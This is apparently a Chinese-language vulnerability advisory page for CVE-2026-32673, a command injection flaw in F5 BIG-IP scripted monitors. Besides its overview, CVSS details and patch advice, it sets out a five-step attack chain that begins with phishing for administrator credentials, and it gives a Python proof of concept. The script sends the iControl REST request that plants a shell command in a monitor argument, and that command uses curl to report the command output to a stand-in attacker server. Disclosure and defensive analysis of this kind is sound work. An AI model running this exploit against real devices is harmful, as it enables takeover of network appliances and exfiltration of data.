IPBUF安全漏洞报告
English
CVE-2026-32673 CVSS 8.7 高危

CVE-2026-32673 F5 BIG-IP 脚本化监控器权限提升漏洞

披露日期: 2026-05-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32673
漏洞类型
命令注入
CVSS评分
8.7 高危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
F5 BIG-IP

相关标签

RCEF5BIG-IP权限提升命令注入Appliance Mode

漏洞概述

F5 BIG-IP设备的脚本化监控器功能中存在一个安全漏洞。拥有资源管理员或管理员角色的经过身份验证的攻击者,可以利用该漏洞在系统上执行任意命令,且权限可能高于当前角色。在设备模式下部署的系统中,成功利用此漏洞可能导致攻击者跨越安全边界,获取底层系统的控制权。请注意,已停止技术支持(EoTS)的软件版本不在评估范围内。

技术细节

该漏洞的根源在于BIG-IP的脚本化监控器未能正确隔离或验证通过管理界面提交的脚本内容。根据CVSS向量分析,攻击者需要具备网络访问能力(AV:N)和高权限账户(PR:H)。虽然攻击者已经是管理员,但BIG-IP的设备模式通常会通过Appliance策略限制直接的Shell访问。该漏洞允许攻击者通过监控器脚本接口绕过这些限制,在底层操作系统层面执行命令。由于影响范围包括机密性和完整性(C:H/I:H),攻击者可能读取敏感配置文件或修改系统关键设置,从而完全破坏设备的完整性。

攻击链分析

STEP 1
1. 凭据获取
攻击者通过钓鱼或社会工程学手段获取F5 BIG-IP的Resource Administrator或Administrator账号密码。
STEP 2
2. 访问管理接口
攻击者使用获取的凭据登录BIG-IP的Web配置界面(Configuration Utility)。
STEP 3
3. 注入恶意脚本
导航至Local Traffic > Monitors,创建或修改一个外部监控器,并在脚本参数中注入恶意的Shell命令。
STEP 4
4. 触发执行
将监控器关联到一个Pool并保存配置,触发BIG-IP系统执行监控器脚本,从而运行攻击者的恶意命令。
STEP 5
5. 边界突破
在设备模式下,攻击者成功获得TMOS Shell权限,跨越管理平面与数据平面之间的安全边界。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 """ Conceptual PoC for CVE-2026-32673 Demonstrates command injection via F5 BIG-IP Scripted Monitor. Requires Administrator or Resource Administrator privileges. """ import requests import urllib3 # Disable SSL warnings for lab environments urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target_ip, username, password): # F5 BIG-IP API endpoint for External Monitors base_url = f"https://{target_ip}/mgmt/tm/ltm/monitor/external" # Authentication auth = (username, password) headers = {'Content-Type': 'application/json'} # Malicious payload: Injecting a shell command within the monitor script argument # The vulnerability allows arbitrary command execution via the script configuration monitor_name = "poc_exploit_monitor" malicious_command = "; /bin/bash -c 'curl http://attacker-server/$(whoami)'" payload = { "name": monitor_name, "filename": "/Common/sample_external_monitor", "args": malicious_command # Injection point } try: print(f"[*] Attempting to create monitor on {target_ip}...") response = requests.post(base_url, json=payload, auth=auth, headers=headers, verify=False) if response.status_code == 200 or response.status_code == 201: print("[+] Monitor created successfully. Check your listener for command execution.") print("[+] Note: The monitor must be associated with a pool member to trigger execution.") else: print(f"[-] Failed to create monitor. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with actual lab credentials TARGET_IP = "192.168.1.100" USER = "admin" PASS = "admin" exploit(TARGET_IP, USER, PASS)

影响范围

F5 BIG-IP (具体受影响版本列表请参考官方K000161040)

防御指南

临时缓解措施
建议立即检查F5 BIG-IP系统版本,并参考官方安全公告K000161040进行修补。在无法立即打补丁的情况下,应加强对后台管理账户的监控,并确保设备未开启不必要的外部管理访问。对于已达到EoTS的版本,建议升级到受支持版本。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表